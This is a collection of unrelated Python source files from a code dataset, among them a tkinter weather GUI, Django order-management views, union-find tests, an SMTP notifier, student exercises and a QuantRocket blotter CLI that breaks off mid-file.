+{"seq_id":"139666833","text":"from tkinter import *\nimport meteo\n\nmaster = Tk()\n\n# Text Input\ne = Entry(master)\ne.pack()\n\n# Label per la Temperatura\ntemp = Label(master, text='Temperatura:')\ntemp.pack()\n\n# Label per visualizzare la temperatura\ntempString = StringVar()\ntempLabel = Label(master, textvariable=tempString)\ntempLabel.pack()\n\n# Label per la Temperatura Minima\ntempmin = Label(master, text='Minima:')\ntempmin.pack()\n\n# Label per visualizzare la temperatura minima\ntempMinString = StringVar()\ntempMinLabel = Label(master, textvariable=tempMinString)\ntempMinLabel.pack()\n\n# Label per la Temperatura Massima\ntempmax = Label(master, text='Massima:')\ntempmax.pack()\n\n# Label per visualizzare la temperatura massima\ntempMaxString = StringVar()\ntempMaxLabel = Label(master, textvariable=tempMaxString)\ntempMaxLabel.pack()\n\n# Funzione per ottenere temperatura attuale, minima e massima convertite in celsius\ndef getMeteo():\n info = meteo.getMeteo(e.get())\n tempString.set(info['temp'])\n tempMaxString.set(info['temp_max'])\n tempMinString.set(info['temp_min'])\n\n# Bottone per richiamare la funzione getMeteo\nb = Button(master, text = \"cerca\", width = 10, command = getMeteo)\nb.pack()\n\nmainloop()","sub_path":"code/meteo/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"559992338","text":"import RPi.GPIO as GPIO\nimport time\n\nclass GPIODoor(object):\n \"\"\"Can be used to open a door at physical/Board pin 5.\n In the current revision (2) this is known as GPIO 01\"\"\"\n def __init__(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(18, GPIO.OUT)\n\n def openDoor(self, duration = 1):\n \"\"\"Sends the open door command to the transponder.\n @duration [Optional] the time the relay is switched to high\"\"\"\n GPIO.output(18, True)\n time.sleep(duration)\n GPIO.output(18, False)\n GPIO.cleanup()\n print('1')\n\nif __name__ == '__main__':\n door = GPIODoor()\n door.openDoor()","sub_path":"Sources/servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"419829312","text":"# --------------------------------------------------------------------------\n# Introdução a Programação de Computadores - IPC\n# Universidade do Estado do Amazonas - UEA\n# Prof. Jucimar Jr\n# TIAGO FERREIRA ARANHA 1715310047\n#\n# 1. Faça um Programa que leia um vetor de 5 números inteiros e mostre-os.\n#---------------------------------------------------------------------------\n\nlista = []\nn = 0\n\nwhile n < 5:\n lista.append(int(input()))\n n+=1\n\nfor numero in lista:\n print(numero)","sub_path":"lista06/lista06_lista01_questao01.py","file_name":"lista06_lista01_questao01.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"211872693","text":"def canConstruct( ransomNote, magazine):\n \"\"\"\n :type ransomNote: str\n :type magazine: str\n :rtype: bool\n \"\"\"\n values = list(magazine)\n print(values)\n for letter in ransomNote:\n if letter in values:\n values.remove(letter)\n print(values)\n else: \n return False\n return True\nprint(canConstruct('aaa', 'abaa'))","sub_path":"ransomNote.py","file_name":"ransomNote.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"570346637","text":"''' Code to plot graph to compare each stimuli for alcoholic and control subjects'''\r\n\r\nimport pandas as pd\r\nimport pickle as pick\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\npath=r'C:\\Users\\USER\\small set'\r\ncol_names=['sensor position','sample number','sensor value(mV)']\r\n\r\npq=None\r\nfor dir in os.listdir(path):\r\n path1=path+'\\\\'+dir \r\n df_list=[]\r\n print(dir)\r\n for files in os.listdir(path1):\r\n path1=path1+'/'\r\n pq=pd.read_pickle(r'C:\\Users\\USER\\small set'+'\\\\'+dir+'\\\\'+files)\r\n df_list.append(pq)\r\n ty=pd.concat(df_list,axis=0)\r\n ui=pq['sensor position'].drop_duplicates()\r\n extra=pd.DataFrame({'sensor position':ui.tolist(),'sensor number':range(1,65)})\r\n ty=pd.merge(ty,extra,on='sensor position')\r\n grp=ty.groupby(['sensor position','sample number','sensor number'])\r\n gh=grp.mean()\r\n pq=gh.reset_index() \r\n if(dir.startswith('a_1')):\r\n a1=pq\r\n if(dir.startswith('c_1')):\r\n c1=pq\r\n if(dir.startswith('a_m')):\r\n am=pq\r\n if(dir.startswith('c_m')):\r\n cm=pq\r\n if(dir.startswith('a_n')):\r\n an=pq\r\n if(dir.startswith('c_n')):\r\n cn=pq\r\n \r\nfor i in range(1,65):\r\n a_1=a1[a1['sensor number'].apply(lambda x:x==i)]\r\n c_1=c1[c1['sensor number'].apply(lambda x:x==i)]\r\n a_m=am[am['sensor number'].apply(lambda x:x==i)]\r\n c_m=cm[cm['sensor number'].apply(lambda x:x==i)]\r\n a_n=an[an['sensor number'].apply(lambda x:x==i)]\r\n c_n=cn[cn['sensor number'].apply(lambda x:x==i)]\r\n fig=plt.figure(figsize=(14.0,8.0))\r\n plt.subplot(1,3,1)\r\n plt.title('Stimulus 1')\r\n plt.plot(a_1.loc[:,'sample number']/255,a_1.loc[:,'sensor value(mV)'],label='Alcoholic')\r\n plt.plot(c_1.loc[:,'sample number']/255,c_1.loc[:,'sensor value(mV)'],label='Control')\r\n plt.xlabel('Time milliseconds')\r\n plt.ylabel('Sensor value uV')\r\n \r\n plt.subplot(1,3,2)\r\n plt.title('Matching stimuli')\r\n plt.plot(a_m.loc[:,'sample number']/255,a_m.loc[:,'sensor value(mV)'],label='Alcoholic')\r\n plt.plot(c_m.loc[:,'sample number']/255,c_m.loc[:,'sensor value(mV)'],label='Control')\r\n plt.xlabel('Time milliseconds')\r\n plt.ylabel('Sensor value uV')\r\n \r\n plt.subplot(1,3,3)\r\n plt.title('Non-Matching stimuli')\r\n plt.plot(a_n.loc[:,'sample number']/255,a_n.loc[:,'sensor value(mV)'],label='Alcoholic')\r\n plt.plot(c_n.loc[:,'sample number']/255,c_n.loc[:,'sensor value(mV)'],label='Control')\r\n plt.xlabel('Time milliseconds')\r\n plt.ylabel('Sensor value uV')\r\n \r\n plt.legend()\r\n fig.savefig('E:\\CSIR CDRi assignment\\Graph\\Plot for various stimuli\\Comparing alcoholic and control subjects\\Electrode'+str(ui.tolist()[i-1])+'.png')\r\n plt.close(fig)\r\n \r\n","sub_path":"Comparing alcoholic and control subjects for various stimuli/Code to plot graph comparing alcoholics vs control.py","file_name":"Code to plot graph comparing alcoholics vs control.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"1830451","text":"# Given two strings, print all the interleavings of the strings.\n# e.g. AB,XY ⇒ ABXY, AXBY, AXYB, XABY, XAYB, XYAB\n\ndef gen_interleaved(s1, s2):\n len1 = len(s1)\n len2 = len(s2)\n \n def _gen_str(i, j):\n if i == len1 and j == len2:\n return [[]]\n \n picked1_results = []\n picked2_results = []\n \n if i < len1:\n picked1 = s1[i]\n picked1_results = _gen_str(i+1, j)\n for item in picked1_results:\n item.append(picked1)\n \n if j < len2:\n picked2 = s2[j]\n picked2_results = _gen_str(i, j+1)\n for item in picked2_results:\n item.append(picked2)\n \n return picked1_results + picked2_results\n \n results = _gen_str(0,0)\n return [\"\".join(reversed(item)) for item in results]\n \n\n\nif __name__ == '__main__':\n s1 = 'AB'\n s2 = 'XY'\n \n s3 = 'xyz'\n s4 = 'abcd'\n print(gen_interleaved(s1,s2))\n print(gen_interleaved(s3,s4))\n","sub_path":"3 Strings/3-06_gen_interleave.py","file_name":"3-06_gen_interleave.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"561647051","text":"#coding=utf-8\n\n# Autor: Daniel Abbassi\n# Beginn: 2012-11\n\nimport xlrd\nimport codecs\n\ndef writeFile(filename, data):\n correctlyWritten = False\n try:\n maybeTheSame = codecs.open(filename, \"r\", \"utf-8\").read()\n if data in maybeTheSame and len(maybeTheSame)==len(data):\n correctlyWritten = True\n except:\n pass \n if not correctlyWritten:\n fileWrite = codecs.open(filename, \"w\", \"utf-8\")\n print >> fileWrite, data\n fileWrite.close()\n\nbook = xlrd.open_workbook(\"ratings.xls\", encoding_override=\"cp1252\").sheet_by_index(0)\n\nresult = \"
\"\n\nfor rownum in range(book.nrows):\n for el in book.row_values(rownum):\n if len(el.split(\",\")) > 4:\n result += \" \"\n name = el.split(\",\")[5].replace('\"', '').strip()\n result += name\n link = el.split(\",\")[len(el.split(\",\"))-1].replace('\"', '').strip()\n result += \" \"\n result += \"\" + link + \"\" + \"
\\r\\n\"\n \nresult += \"
\"\nwriteFile(\"rateThis.html\", result)","sub_path":"CreateMovieList/src/NewIMDbRatings.py","file_name":"NewIMDbRatings.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"452527104","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom accounts.models import *\nfrom .forms import OrderForm,CreateUesrForm\nfrom django.forms import inlineformset_factory\nfrom .filters import OrderFilter\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import unauthenticated_user,allowed_users,admin_only\nfrom django.contrib.auth.models import Group\nfrom .forms import CustomerForm\n\n\n# Create your views here.\n@unauthenticated_user\ndef Register(request):\n \n form = CreateUesrForm()\n if request.method == 'POST':\n form = CreateUesrForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n ## Note :-- we can do this by using signals very easily\n # group = Group.objects.get(name='customer')\n # user.groups.add(group) # left <====== right\n # Customer.objects.create(\n # user=user.username,\n # ) \n\n messages.success(request,'Account was successfully created for ' + username)\n return redirect('login')\n\n context = {\"form\":form} \n return render(request, \"accounts/register.html\",context) \n\n\n@unauthenticated_user\ndef loginPage(request):\n\n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request,user)\n return redirect('home')\n\n else:\n messages.info(request,'Username OR Password is incorrect') \n\n\n context = {} \n return render(request, \"accounts/login.html\", context) \n\n\ndef logoutPage(request):\n logout(request)\n return redirect('login')\n\n\n\n@login_required(login_url='login')\n@admin_only\ndef home(request):\n orders = Order.objects.all()\n customers = Customer.objects.all()\n\n total_orders = orders.count()\n total_customers = customers.count()\n\n delivered = orders.filter(status=\"Delivered\").count()\n pending = orders.filter(status=\"Pending\").count()\n\n context = {'customers': customers, 'orders': orders,\n \"total_orders\":total_orders, \"total_customers\":total_customers, \"delivered\":delivered,\n \"pending\":pending,\n }\n return render(request, 'accounts/dashboard.html',context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['customer'])\ndef userPage(request):\n orders = request.user.customer.order_set.all()\n\n total_orders = orders.count()\n delivered = orders.filter(status='Delivered').count()\n pending = orders.filter(status='Pending').count()\n context = {'orders':orders, 'total_orders':total_orders, 'delivered':delivered, 'pending':pending,}\n return render(request, 'accounts/user.html', context) \n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['customer'])\ndef accountSettings(request):\n customer = request.user.customer\n form = CustomerForm(instance=customer)\n\n if request.method == 'POST':\n form = CustomerForm(request.POST, request.FILES, instance=customer)\n if form.is_valid():\n form.save()\n context = {'form':form}\n\n return render(request, 'accounts/account_settings.html', context) \n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef products(request):\n products = Product.objects.all()\n context = {'products': products}\n\n return render(request, 
'accounts/products.html',context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef customer(request, pk_test):\n customer = Customer.objects.get(id=pk_test)\n print(\"=======1=====\", customer.id)\n \n orders = customer.order_set.all() # \n order_count = len(orders)\n print(\"=======1=====\", orders) \n\n myFilter = OrderFilter(request.GET, queryset=orders)\n orders = myFilter.qs\n \n \n context = {'customer': customer, 'orders': orders,'order_count': order_count,'myFilter':myFilter}\n return render(request, 'accounts/customer.html',context) \n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef createOrder(request,pk):\n OrderFormSet = inlineformset_factory(Customer,Order,fields=('product','status'),extra=10)\n customer = Customer.objects.get(id=pk)\n # order = Order.objects.get(id=pk)\n # form = OrderForm(initial={'customer':customer,'status': order.status})\n # form = OrderForm(initial={'customer':customer})\n formset = OrderFormSet(queryset=Order.objects.none() ,instance=customer) \n if request.method == 'POST':\n # form = OrderForm(request.POST) \n formset = OrderFormSet(request.POST,instance=customer)\n if formset.is_valid():\n formset.save()\n return redirect('/')\n\n\n context = {\"formset\":formset}\n return render(request,\"accounts/order_form.html\",context)\n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef updateOrder(request,pk):\n order = Order.objects.get(id=pk)\n form = OrderForm(instance=order)\n\n if request.method == 'POST':\n form = OrderForm(request.POST,instance=order)\n if form.is_valid():\n form.save()\n return redirect('/')\n context = {'form':form}\n return render(request,\"accounts/order_form.html\", context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['admin'])\ndef deleteOrder(request,pk):\n order = Order.objects.get(id=pk)\n if request.method == 'POST':\n order.delete()\n return redirect('/')\n\n context = {'item':order}\n return render(request,\"accounts/delete.html\", context)\n\n\n \n\n \n\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"41758884","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Tests for algspy.uf\n\"\"\"\n\nimport os\nimport time\nimport pytest\n\nfrom algspy.uf import UF\n\nbase_dir = os.path.dirname(__file__)\n\nclass TestUnionFind:\n\n def test_size(self):\n \"\"\" Makes sure size method gives the right number of elements \"\"\"\n N = 5\n uf = UF(N)\n assert uf.size() == N\n\n def test_invalid_arguments(self):\n \"\"\" Gives non-integers to class constructor to test raise \"\"\"\n invalid_args = (None, -2, 'eleven', {}, [], (), 1.0)\n for arg in invalid_args:\n with pytest.raises(ValueError):\n UF(arg)\n\n def test_invalid_node_ranges(self):\n \"\"\" Makes sure operations only work on range [0, N) \"\"\"\n N = 10\n uf = UF(N)\n\n with pytest.raises(IndexError):\n uf.connected(-1, 10)\n uf.union(1, 11)\n uf.union(-2, 15)\n\n\n def test_uf_funtionality(self):\n \"\"\" Tests union-find basic functionality with 10 elements \"\"\"\n test_filepath = os.path.join(base_dir, 'data/tinyUF.txt')\n with open(test_filepath) as f:\n N = int(f.readline())\n uf = UF(N)\n for line in f:\n p, q = [int(n) for n in line.split()]\n if not uf.connected(p, q):\n uf.union(p, q)\n \n assert uf.count() == 2\n assert uf.connected(8, 4) is True\n assert uf.connected(7, 4) is False\n assert uf.connected(3, 9) is True\n assert uf.connected(5, 3) is False\n assert uf.connected(0, 2) is True\n assert uf.connected(9, 0) is False\n\n def test_uf_performance(self):\n \"\"\" Tests runtime doing 2 million operations \"\"\"\n start_time = time.time()\n test_filepath = os.path.join(base_dir, 'data/largeUF.txt')\n with open(test_filepath) as f:\n N = int(f.readline())\n largeUF = UF(N)\n for line in f:\n p, q = [int(n) for n in line.split()]\n if not largeUF.connected(p, q):\n largeUF.union(p, q)\n end_time = time.time()\n\n assert (end_time - start_time) < 15.0\n","sub_path":"tests/test_union_find.py","file_name":"test_union_find.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"37435384","text":"'''\nCreated on Sep 21, 2018\n\n@author: ashwath\n\n\n'''\nfrom gateway import ConfigConst\nfrom gateway import ConfigUtil\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\nclass SmtpClientConnector(object):\n '''\n classdocs\n '''\n\n\n def __init__(self):\n '''\n load the configuration properties file on creation\n '''\n self.config = ConfigUtil.ConfigUtil('../../../data/ConnectedDevicesConfig.props')\n self.config.loadConfig()\n print('Configuration data...\\n' + str(self.config))\n \n '''\n #This method will read all the configuration details from the file ConnectedDevicesConfig.props\n #Read the mail host, to mailID, from mailID, authentication tokens from the configuration file (private file)\n '''\n def publishMessage(self, topic, data):\n host= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION,ConfigConst.HOST_KEY)\n port= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION,ConfigConst.PORT_KEY)\n fromAddr= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION,ConfigConst.FROM_ADDRESS_KEY)\n toAddr= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION, ConfigConst.TO_ADDRESS_KEY)\n authToken= self.config.getProperty(ConfigConst.SMTP_CLOUD_SECTION, ConfigConst.USER_AUTH_TOKEN_KEY)\n msg= MIMEMultipart()\n msg['From'] = fromAddr\n msg['To']= toAddr\n \n msg['Subject'] = topic\n \n #Body is send as a parameter\n msgBody = str(data)\n msg.attach(MIMEText(msgBody))\n msgText= msg.as_string()\n # send e-mail notification\n smtpServer= smtplib.SMTP_SSL(host, port)\n smtpServer.ehlo()\n smtpServer.login(fromAddr, authToken)\n smtpServer.sendmail(fromAddr, toAddr, msgText)\n smtpServer.close()\n ","sub_path":"VehicleCrashDetection/gateway/SmtpClientConnector.py","file_name":"SmtpClientConnector.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"583221078","text":"# Pointcloud_Server.py\n# \n#\n# Created by Ayat Mohammed on 8/12/15.\n#\nfrom paraview.simple import *\nimport paraview.servermanager as sm\n\n\n# Creates a new built-in session and makes it the active session.\n#def Connect(ds_host=None, ds_port=11111, rs_host=None, rs_port=11111)\n#Connect()\nConnect('localhost',10001)\n\n#sphere=Sphere()\n#for x in range(0, 50):\nreader = sm.sources.XMLUnstructuredGridReader(FileName = \"/work/blueridge/maaayat/seb3rd_new/seb3rd_new_ab.vtu\")\nd3 = sm.filters.D3(Input = reader)\n #d3output = sm.Fetch(d3)\nwriter = sm.writers.XMLPUnstructuredGridWriter(Input = d3, FileName = \"/work/blueridge/maaayat/seb3rd_new/seb3rd_new_ab.pvtu\")\nwriter.UpdatePipeline()\n\nrenModule = sm.CreateRenderView()\ncone = Cone()\ndisplay = sm.CreateRepresentation(cone, renModule)\n\n# Creates a new render view on the active session.\nview = sm.CreateRenderView()\nrepr = sm.CreateRepresentation(d3, view)\n\"\"\"\nreader.UpdatePipeline()\ndataInfo = reader.GetDataInformation()\npointDataInfo = dataInfo.GetPointDataInformation()\narrayInfo = pointDataInfo.GetArrayInformation(\"displacement9\")\n\"\"\"\n\n\n# Create a new sphere proxy on the active session and register it\n# in the sources group.\n#sphere = sm.sources.SphereSource(registrationGroup=\"sources\", ThetaResolution=16, PhiResolution=32)\n\n# Create a representation for the sphere proxy and adds it to the render\n# module.\n#display = sm.CreateRepresentation(sphere, renModule)\n#cone = Cone()\n#display = sm.CreateRepresentation(cone, renModule)\n#help(cone)\nrenModule.StillRender()\nview.StillRender()\n#sm.Disconnect()\n","sub_path":"Pointcloud_Server.py","file_name":"Pointcloud_Server.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"146597345","text":"# i7-4870HQ 4 cores, 8 threads, 2.5 GHz -> 3.7 GHz\n# real\t0m1.680s\n# user\t0m1.617s\n# sys\t0m0.053s\n\n# Performance here is definitely not optimal, but I can't think\n# of a way to implement a sieve with multiprocessing\n\nfrom math import sqrt\n\ndef generate_sieve(n):\n\tsieve = [ i for i in range(n)]\n\n\tremove_int = 2\n\ti = 2\n\n\twhile remove_int < sqrt(len(sieve)):\n\t\twhile (remove_int * i) < len(sieve):\n\t\t\tsieve[remove_int*i] = 0\n\t\t\ti += 1\n\t\ti = 2\n\t\tremove_int += 1\n\t\twhile(sieve[remove_int] == 0):\n\t\t\tremove_int += 1\n\t\t\tif remove_int >= len(sieve):\n\t\t\t\tbreak\n\n\treturn sieve[2:]\n\nif __name__ == '__main__':\n\n\tprint(sum(generate_sieve(2000000)))","sub_path":"euler10.py","file_name":"euler10.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"356905880","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 16 14:59:59 2015\n\n@author: 96isasva\n\"\"\"\n\nclass Crop:\n def __init__(self,growth_rate, light_need, water_need):\n \n self._growth = 0\n self._days_groowing = 0\n self._growth_rate = growth_rate\n self._light_need = light_need\n self._water_need = water_need\n self._status = \"Seed\"\n self._type = \"Generic\"\n \ndef main():\n new_crop = Crop(1,4,3)\n print(new_crop._status)\n print(new_crop._light_need)\n print(new_crop._water_need)\n new_crop2 = Crop(1,5,9)\n print(new_crop2._status)\n print(new_crop2._light_need)\n print(new_crop2._water_need)\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"320023831","text":"\n\n\n\n\n\n\n\n\n\n\ndef large(a, seq) : \n x=0\n length = 0\n for k in a : \n length = length + 1\n for i in range(length) : \n p = 0\n x = 0\n for j in range(length) :\n for w in range(1, length) : \n if a[i] < a[j]: \n x = x + 5 \n if a[i] == a[j] and a[i] < a[w]: \n x = x + 5 \n else :\n x = x \n if x == 0 :\n errors = len(seq)-a[i] \n largest = i\n li = a[0:largest] + a[largest+1: len(a)]\n \n return errors, i \n\n\n\n\n\ndef match(protien, seq):\n count = 0\n li = []\n x = 0\n y = len(seq)\n while y < len(protien): \n h = 0\n count = 0\n for i in protien[x:y]: \n if i == seq[h]: \n count = count + 1 \n h = h+1 \n li = li + [count]\n x = x + 1 \n y = y + 1\n er, pos = large(li, seq) \n return er, pos \n\n\n\n\n\ndef textinfo():\n try: \n text = input(\"Please select a .txt file you would like to be evaluated: \" )\n text = open(text, \"r\")\n protien = text.readline()\n protien = protien.strip()\n numlines = 0\n for line in text :\n numlines = numlines +1\n text.seek(0)\n text.readline()\n seq = \"shit\"\n for i in range(1, numlines+1): \n seq = text.readline()\n seq = seq.strip() \n er, pos = match(protien, seq)\n print(\"sequence\", i, \"has\", er, \"errors at position\", pos)\n except FileNotFoundError :\n print()\n print(\"You may have incorrectly entered the document's name.\")\n print()\n\n\n\n\n\n\n\ndef main():\n try:\n textinfo()\n except NameError :\n print()\n print(\"Sorry, we can't seem to find that file, try another\")\n print()\nmain()\n\n\n\n\n","sub_path":"testFiles/match/match27.py","file_name":"match27.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"55602869","text":"# Copyright 2018 QuantRocket - All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nfrom quantrocket.cli.utils.parse import dict_str\n\ndef add_subparser(subparsers):\n _parser = subparsers.add_parser(\"blotter\", description=\"QuantRocket blotter CLI\", help=\"Place orders and track executions\")\n _subparsers = _parser.add_subparsers(title=\"subcommands\", dest=\"subcommand\")\n _subparsers.required = True\n\n examples = \"\"\"\nPlace one or more orders.\n\nReturns a list of order IDs, which can be used to cancel the orders or check\ntheir status.\n\nExamples:\n\nPlace orders from a CSV file.\n\n quantrocket blotter order -f orders.csv\n\nPlace orders from a JSON file.\n\n quantrocket blotter order -f orders.json\n\nPlace an order by specifying the order parameters on the command line:\n\n quantrocket blotter order --params ConId:123456 Action:BUY Exchange:SMART TotalQuantity:100 OrderType:MKT Tif:Day Account:DU12345 OrderRef:my-strategy\n \"\"\"\n parser = _subparsers.add_parser(\n \"order\",\n help=\"place one or more orders\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n source_group = parser.add_mutually_exclusive_group()\n source_group.add_argument(\n \"-f\", \"--infile\",\n metavar=\"INFILE\",\n dest=\"infilepath_or_buffer\",\n help=\"place orders from this CSV or JSON file (specify '-' to read file \"\n \"from stdin)\")\n source_group.add_argument(\n \"-p\", \"--params\",\n nargs=\"*\",\n type=dict_str,\n metavar=\"PARAM:VALUE\",\n help=\"order details as multiple key-value pairs (pass as 'param:value', for \"\n \"example OrderType:MKT)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_place_orders\")\n\n examples = \"\"\"\nCancel one or more orders by order ID, conid, or order ref.\n\nExamples:\n\nCancel orders by order ID:\n\n quantrocket blotter cancel -o 6002:45 6001:46\n\nCancel orders by conid:\n\n quantrocket blotter cancel -i 123456\n\nCancel orders by order ref:\n\n quantrocket blotter cancel --order-refs my-strategy\n\nCancel all open orders:\n\n quantrocket blotter cancel --all\n \"\"\"\n parser = _subparsers.add_parser(\n \"cancel\",\n help=\"cancel one or more orders by order ID, conid, or order ref\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n \"-o\", \"--order-ids\",\n metavar=\"ORDER_ID\",\n nargs=\"*\",\n help=\"cancel these order IDs\")\n parser.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"cancel orders for these conids\")\n parser.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"cancel orders for these order refs\")\n parser.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"cancel orders for these accounts\")\n parser.add_argument(\n \"--all\",\n action=\"store_true\",\n default=False,\n dest=\"cancel_all\",\n help=\"cancel all open orders\")\n 
parser.set_defaults(func=\"quantrocket.blotter._cli_cancel_orders\")\n\n examples = \"\"\"\nList order status for one or more orders by order ID, conid, order ref, or account.\n\nExamples:\n\nList order status by order ID:\n\n quantrocket blotter status -o 6002:45 6001:46\n\nList order status for all open orders:\n\n quantrocket blotter status --open\n\nList order status of open orders by conid:\n\n quantrocket blotter status -i 123456 --open\n\nList order status of open orders by order ref:\n\n quantrocket blotter status --order-refs my-strategy --open\n \"\"\"\n parser = _subparsers.add_parser(\n \"status\",\n help=\"List order status for one or more orders by order ID, conid, \"\n \"order ref, or account\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n \"-o\", \"--order-ids\",\n metavar=\"ORDER_ID\",\n nargs=\"*\",\n help=\"limit to these order IDs\")\n parser.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to orders for these conids\")\n parser.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to orders for these order refs\")\n parser.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to orders for these accounts\")\n parser.add_argument(\n \"--open\",\n action=\"store_true\",\n dest=\"open_orders\",\n help=\"limit to open orders (default False, must be True if order_ids not provided)\")\n parser.add_argument(\n \"-f\", \"--fields\",\n metavar=\"FIELD\",\n nargs=\"*\",\n help=\"return these fields in addition to the default fields (pass '?' or any invalid \"\n \"fieldname to see available fields)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_list_order_statuses\")\n\n examples = \"\"\"\nQuery current positions.\n\nExamples:\n\nQuery current positions in human-readable format:\n\n quantrocket blotter positions --pretty\n\nSave current positions to CSV file:\n\n quantrocket blotter positions --outfile positions.csv\n\nQuery positions for a single order ref:\n\n quantrocket blotter positions --order-refs my-strategy\n \"\"\"\n parser = _subparsers.add_parser(\n \"positions\",\n help=\"query current positions\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n filters = parser.add_argument_group(\"filtering options\")\n filters.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to these conids\")\n filters.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to these order refs\")\n filters.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to these accounts\")\n outputs = parser.add_argument_group(\"output options\")\n outputs.add_argument(\n \"-o\", \"--outfile\",\n metavar=\"OUTFILE\",\n dest=\"filepath_or_buffer\",\n help=\"filename to write the data to (default is stdout)\")\n output_format_group = outputs.add_mutually_exclusive_group()\n output_format_group.add_argument(\n \"-j\", \"--json\",\n action=\"store_const\",\n const=\"json\",\n dest=\"output\",\n help=\"format output as JSON (default is CSV)\")\n output_format_group.add_argument(\n \"-p\", \"--pretty\",\n action=\"store_const\",\n const=\"txt\",\n dest=\"output\",\n help=\"format output in human-readable format (default is CSV)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_download_positions\")\n\n examples = \"\"\"\nQuery executions from the 
